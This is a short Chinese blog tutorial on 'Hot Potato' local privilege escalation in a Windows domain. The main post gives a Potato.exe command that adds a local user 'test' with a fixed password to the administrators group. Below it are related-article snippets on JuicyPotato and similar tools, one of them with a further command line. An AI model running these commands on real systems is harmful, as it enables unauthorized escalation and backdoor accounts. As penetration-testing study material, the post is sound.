域渗透之热土豆的提权

最新推荐文章于 2024-03-31 10:11:28 发布
最新推荐文章于 2024-03-31 10:11:28 发布
阅读量457 收藏
点赞数
文章标签: 安全 web安全 哈希算法 测试工具 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612728/article/details/123010630
版权

注意这个不是提域控的管理身份,而是利用普通的域用户进行提取为本地的管理员权限.只需要知道普通域用户的账号和密码即可,这个可以通过抓取本地的用户hash进行用hashcat进行破解即可.

  1. 一开始使用普通的域用户来创建用户是创建不成功的.
    在这里插入图片描述

2.使用Potato.exe来进行创建用户.
ip是本地的域用户ip,net user是创建一个用户,net localgroup是添加到管理员组中.

Potato.exe -ip 192.168.0.207 -disable_exhaust true -cmd "C:\Windows\System32\cmd.exe /K net user test 123.com /add && net localgroup administrators test /add"

在这里插入图片描述
3.查询是否创建用户成功
在这里插入图片描述
这篇文章没有什么技术含量,难的地方就是当你进去到内网中,应该如何去抓取hash,怎么绕过防火墙等等的操作.共勉.

请再坚持一下
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透之内网提权
hackzkaq的博客
11-12 2671
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 在windows中,权限种类还是比较多,但我们涉及到的基本就三个 User(普通用户权限)、Administrator(管理员权限)和system(系统权限) 一、提权方法 常用的提权方法 系统内核溢出提权 数据库提权 错误的系统配置提权 组策略首选项提权 DLL劫持提权 滥用高权限令牌提权 第三方软件/服务提权 二、内核溢出提权 电脑里的数据就好比水缸里的水,正常情况下水满了就不会在向水缸里注水 如果继续注入,水就会溢出到外界从而污染外界
渗透提权入门练习(MS14-068)
ai_64的博客
04-09 561
一、漏洞说明 微软在2014年11月18日发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。该补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为管理员(Domain Admin)身份。也就是说,你在一台普通用户的机器上利用这个漏洞,那么这个用户就变成管理员权限,然后,该...
多汁土豆(JuicyPotato)的提权使用
zhanqinli的博客
04-21 896
4、接着打开结果日志result.log文件,可以看到有部分的clisd是system权限,选择其中一个,在命令行中输入>JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {000C101C-0000-0000-C000-0000000000461}链接:https://pan.baidu.com/s/1Ev-0THVltaSMDipFvBcrFg。2、在命令行窗口使用whoami /priv查看权限,如果全都禁用则无法提权
Potato提权小结
热门推荐
wo41ge的博客
11-11 1万+
前言 当我们拿到webshell 却苦于无法提权 早之前有巴西烤肉提权,有pr提权 今天 来一个土豆提权合集 妈妈再也不担心我的webshell无法提权了 Hot Potato 前言 利用 Windows 中的已知问题在默认配置中获得本地权限提升 即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗 攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至NT AUTHORITY\SYSTEM 影响范围 Windows 7、8、10、Server 2008 和 Ser
渗透 | 利用DnsAdmins提权到SYSTEM
Ms08067安全实验室
04-12 989
文章来源|MS08067 公众号读者投稿本文作者:VastSky(Ms08067实验室读者)一、前言 在渗透中,我们获得DNS管理员(DNSAdmin)权限后,可以使用dnscmd.e...
渗透之流量劫持
02-01
windowsDomain中文翻译为既是Windows网络操作系统的逻辑组织单元,也是...在网络渗透攻击中,攻击者如果获取了的权限,那么攻击者就有可能获取公司的机密,控制公司的一切。所以安全是企业安全最为核心的一个
土豆提权神器(改进版)
04-15
具体的使用方法请查看本人的文章:服务器提权常见方法介绍。 本着免费分享的原则,下载时不需要扣除用户的积分,可放心和使用。同时由于本工具涉及的敏感操作,杀毒软件一定会报毒,可添加信任,如果不放心,请在...
部分渗透提权文章
04-16
"部分渗透提权文章"的主题聚焦于如何在获取初步访问权限后,进一步提升权限,进行内网渗透,以及在Linux环境下的相关技巧。这里我们将深入探讨XSS(跨站脚本)攻击、社会工程学利用,以及提权的基本概念和实践案例。...
渗透测试 提权
07-18
本文档描述了渗透提权的基本套路
Potato提权(原理简述)
qq_18811919的博客
12-29 1440
在红蓝对抗过程中Web打点之后往往需要进行提权才能进行横向操作,本篇文章将简单讲述土豆提权原理。
BadPotato:Windows权限提升BadPotato
03-19
土豆 Windows 2012-2019 Windows 8-10 引用
内网渗透环境探索和简单提权
m0_70349048的博客
03-31 362
因为控可以登录内所有管辖的主机,因此登录过程中的密码会被记录下来,即winlog进程把密码拿到,发给后面的lasss,然后还会进行hash加密保存到SAM中。假如我么已经拿下了一个普通主机,想要登录权限更大的控,我们的目的就是获取控的密码,明文更好,hash后的也能用。内主机就作为普通的机器,只有普通的权限,一般我们拿下跳板机之后,就会拿下普通的主机,然后想办法提权或者进入控。服务器是管理环境的,相当于“领导”,可以划分,提供服务,并且可以登录内的任何一台机器。
土豆提权历史进程
god_Zeo的安全博客
05-25 1114
0x01简介 在研究提权的时候,发现最近这些东西比较多,而且我自己看起来也是比较混乱,就从网上收集了一些资料,做一个整合和搬运,复现和整理一下,方便你我 现在还是有点迷糊,这个估计会再更新,等我再理的清楚一些,然后后面就是单个的文章发布,这个是总的简介 0x01 历史进程 2016-01-16 初代土豆 劫持wpad配合ntlm中继来进行提权 Hot Potato – Windows Privilege Escalation 2016-09-26 二代土豆 劫持系统com服务器地址到恶意服务器上,然后在NT
土豆 (ms16-075) 提权方法
good good study
03-11 9907
所谓的烂土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
土豆配合令牌窃取提权复现
m0_65096687的博客
05-13 165
土豆配合令牌窃取提权是用来解决普通令牌窃取提权因为webshell权限太低无法提权成功。1.先用msf生成一个windows的后门监听上线。4.使用msf自带的令牌窃取功能。环境:内网kali和win10。3.利用msf上传烂土豆。先查看一下未提权的权限。2.在网上下载烂土豆
土豆提权复现
longwanlian的博客
10-16 274
值得注意的是,烂土豆方法只适用于符合特定条件的Windows版本和配置,例如使用旧版的Windows Server操作系统以及较早的Windows 10版本。根据微软的修补程序,烂土豆漏洞已经在最新版本的Windows中被修复。本次为复现提权的实验,所以就对传递shell之间的细节忽略,拖拽shell上传目标靶机,在双击文件,笔记是一边复现一边写的。现在改用windows版本的msf倒是成功进入meterpreter后渗透模块。然后依旧没有成功,休息了一下,晚上看的时候就成功了,有时候还怪玄学的。
webshell提权_提权小神器JuicyPotato多种应用场景详解
weixin_42176827的博客
01-12 1252
0X00-Juicy-Potato简介Juicy Potato江湖人称烂土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(带有糖的RottenPotatoNG,带有一点汁液,即Windows服务帐户中的**另一种本地特权升级工具)到NT AUTHORITY \ SYSTEM ***)追根到底是一种Windows的本地提权工具,利用了COM对象进行提权 ...
Potato土豆win综合提权
weixin_30559481的博客
04-08 594
0x01 NBNS和WDAP NBNS: 在 Windows 系统中的另外一种名称就是 NetBIOS 名称,准确的说 NetBIOS 名称并非是一种名字系统,而是 Windows 操作系统网络的一个编程接口,允许主机之间使用 NetBIOS 名称进行通信,通信过程是建立在 NetBIOS 协议之上的。在安装完 Windows 系统后系统会默认使用计算机的名字做为当前主机的 NetBIOS 名...
渗透测试linux提权
最新发布
05-30
渗透测试Linux提权是指在Linux系统中通过各种手段获取管理员权限的过程。常见的渗透测试Linux提权方法包括: 1. 利用系统漏洞:渗透测试人员通过分析系统漏洞,找到可以利用的漏洞,并利用漏洞获取管理员权限。 2....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值